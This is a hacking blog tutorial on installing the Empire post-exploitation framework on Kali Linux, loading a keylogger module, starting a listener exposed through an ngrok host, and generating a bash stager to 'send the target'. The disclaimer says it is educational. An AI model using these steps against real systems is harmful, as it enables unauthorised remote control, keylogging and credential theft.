Sunday, July 14, 2019

How to set up and use empire part one

welcome to hacking a rise on this fine Sunday i am the one and only laughingman and in this post im going to show you how to set up empire on kali linux
so lets get stuck in



What is Empire

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.




Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we’ve interacted with heavily here and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.

Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior.



Installing empire

Open a terminal and type git clone https://github.com/EmpireProject/Empire.git
Hacking A Rise gitclone-empire-300x152

now we type cd Empire then ls then cd setup then ls then chmod +x install.sh then ./install.sh with for it to install mite take some time
Hacking A Rise cdand-install-196x300

Right lads we have the requirements installed never hurts to be on the safe side i always run pip3 install -r requirements.txt agen with for it to install
Hacking A Rise pip3-rinstallempire-216x300

Right now lads type cd .. to go back and then chmod +x empire and then ./empire
Hacking A Rise empirestart-300x191




Right as u see there 285 modules in this framework lets have a look at help first
Hacking A Rise helpempier-300x257

so to view the modules type usemodule then the tab button in the key bored
Hacking A Rise mudulesempire-196x300

To use the modules just type usemodule powershell/collection/keylogger for a example
Hacking A Rise exampleemplire-275x300
there we can set are settings

now lets more on to listeners so type back to go back to the main menu of Empire and then type listeners this bring up the active listeners
Hacking A Rise listenersempire-300x107

now type help for listners commands
Hacking A Rise helplistenersempire-300x257
agents – Will allow you to jump to agents menu.
back & main – Will take you back to the main menu.
exit – Will exit from Empire.
help – Will display help menu as shown in the above image.
info – Will display information about the active listener.
kill – Will kill a particular listener.
launcher – Used to generate an initial launcher for a listener.
list – Will list all the active listeners.
usestager – Used to use a stager (we will see below what exactly is a stager).
uselistener – Used to start a listener module.

now we wanna use a meterpreter type uselistener meterpreter and then info
Hacking A Rise meterpreter-300x150

since by default the listener is set to local ip you wanna attack on wan u need forward the right ports or use ngrok or serveo

two set the host u frist need to clear the defalt one by typeing unset Host
Hacking A Rise unsetHost-300x96




and to set the Host type set Host http://c816e04f.ngrok.io im using ngrok for this one
Hacking A Rise setHost-300x152

we can start a listener using the execute command
Hacking A Rise executeempire-300x66

Now we type back then back agen u see the active listeners
Hacking A Rise listenactive-300x250

now we wanna use are stager so type usestager followed by the tab button to load the list
Hacking A Rise stagers-300x70

to use one type usestager and the name for example i wanna use the bash one so i type usestager multi/bash

Hacking A Rise usestager-multibash-300x171

now lads we type execute are ngrok link be what ya send the target

DISCLAIMER

Hackingarise does not take responsiblity for the actions you make commit with this tool and/or knowledge!! We make these posts for educational purposes and to teach how hackers can use certain tools to hack you and we do not try to inspire any blackhat activities in the doing of so!!




No comments:

Post a Comment

Note: Only a member of this blog may post a comment.